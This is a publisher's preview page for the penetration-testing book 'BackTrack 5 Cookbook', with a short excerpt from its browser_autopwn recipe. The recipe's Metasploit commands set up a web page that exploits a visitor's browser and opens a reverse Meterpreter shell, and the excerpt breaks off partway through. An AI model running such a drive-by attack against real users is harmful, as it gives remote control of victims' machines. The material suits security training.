Book Image

BackTrack 5 Cookbook

By : Willie L. Pritchett, David De Smet
Book Image

BackTrack 5 Cookbook

By: Willie L. Pritchett, David De Smet

Overview of this book

<p>BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm.<br /><br />"BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, priviledge escalation, and covering your tracks.<br /><br />The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests.<br /><br />We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, Password cracking, and BackTrack forensics.<br /><br />"BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike.</p>
Table of Contents (17 chapters)
BackTrack 5 Cookbook
Credits
About the Authors
About the Reviewers
www.PacktPub.com
Preface
Index

Implementing the browser_autopwn module


Browser_autopwn is an auxiliary module provided by Metasploit that allows you to automate an attack on a victim's machine simply by the user accessing a web page. Browser_autopwn performs a fingerprint of the client before it attacks, meaning that it will not try a Mozilla Firefox exploit against an Internet Explorer 7 browser. Based upon its determination of the browser, it decides which exploit is the best to deploy.

Getting ready

A connection to the Internet or internal network is required to complete this recipe.

How to do it...

Let's begin by opening a terminal window:

  1. Open a terminal window.

  2. Launch the MSFCONSOLE:

    msfconsole
    
  3. Search for the Autopwn modules:

    search autopwn
    
  4. Use the browser_autopwn module:

    use auxiliary/server/browser_autopwn
    
  5. Set our payload. In this case, we use Windows Reverse TCP:

    set payload windows/meterpreter/reverse_tcp
    
  6. Show the options for this type of payload:

    show options
    
  7. Set the host IP address to where the reverse connection...